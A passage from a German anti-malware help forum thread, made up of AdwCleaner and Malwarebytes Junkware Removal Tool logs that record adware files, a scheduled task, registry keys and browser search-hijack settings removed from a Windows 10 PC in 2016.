:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [11170 Bytes] - [19/10/2016 17:20:32]
C:\AdwCleaner\AdwCleaner[S0].txt - [10464 Bytes] - [19/10/2016 17:17:30]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [11318 Bytes] ##########
JRT

Code:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 10 Home x64
Ran by maikp (Administrator) on 19.10.2016 at 17:24:38,60
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 11

Successfully deleted: C:\Users\maikp\AppData\Local\dailybee (Folder)
Successfully deleted: C:\Users\maikp\Appdata\LocalLow\company (Folder)
Successfully deleted: C:\Users\maikp\AppData\Roaming\dailybee (Folder)
Successfully deleted: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\user.js (File)
Successfully deleted: C:\Users\Public\thunder network (Folder)
Successfully deleted: C:\WINDOWS\system32\Tasks\SMW_UpdateTask_Time_333836353438353032372d4a5b5b345a417845455a376c (Task)
Successfully deleted: C:\WINDOWS\prefetch\DRIVERQUERY.EXE-7E7978A8.pf (File)
Successfully repaired: C:\ProgramData\Microsoft\windows\Start Menu\Programs\Mozilla Firefox.lnk (Shortcut)
Successfully repaired: C:\Users\maikp\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk (Shortcut)
Successfully repaired: C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk (Shortcut)
Successfully repaired: C:\Users\Public\Desktop\Mozilla Firefox.lnk (Shortcut)

Deleted the following from C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\prefs.js
user_pref(browser.search.searchengine.hp, hxxp://www.youndoo.com/?z=7b9a545d9d51abf865cc5feg4z7mew1t6taodmbg6g&from=amz&uid=TOSHIBAXDT01ACA100_55TKBE6NSXX55TKBE6NSX&type=hp
user_pref(browser.search.searchengine.sp, hxxp://www.youndoo.com/search/?from=amz&q={searchTerms}&type=sp&uid=TOSHIBAXDT01ACA100_55TKBE6NSXX55TKBE6NSX&z=7b9a545d9d51abf865c
user_pref(browser.search.searchengine.uid, TOSHIBAXDT01ACA100_55TKBE6NSXX55TKBE6NSX);
user_pref(browser.search.searchengine.url, hxxp://www.youndoo.com/search/?from=amz&q={searchTerms}&type=sp&uid=TOSHIBAXDT01ACA100_55TKBE6NSXX55TKBE6NSX&z=7b9a545d9d51abf865
user_pref(browser.urlbar.suggest.searches, true);
user_pref(keyword.URL, hxxp://www-searching.com/search.aspx?site=shdefault1&prd=smw&pid=s&shr=d&q={searchTerms}&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,);



Registry: 14

Successfully deleted: HKLM\SYSTEM\CurrentControlSet\services\PCSUUCDRV (Registry Key)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Main\\Search Bar (Registry Value)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Main\\Search Page (Registry Value)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Main\\SearchAssistant (Registry Value)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page (Registry Value)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Search\\Default_Search_URL (Registry Value)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchUrl\\Default (Registry Value)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9FFEE954-DB75-492A-B1CA-BA23C9B83007} (Registry Key)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FAD3AE2D-3E11-4E7C-82B8-904BB0EBAD7B} (Registry Key)
Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FFCDE64D-6974-45D8-8B68-1614D9D89C2B} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FFCDE64D-6974-45D8-8B68-1614D9D89C2B} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page (Registry Value)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page (Registry Value)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl\\Default (Registry Value)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 19.10.2016 at 17:26:14,18
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Alle Zeitangaben in WEZ +1. Es ist jetzt 12:29 Uhr.
Seite 1 von 6 1 23 Letzte »
100 Beiträge dieses Themas auf einer Seite anzeigen

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131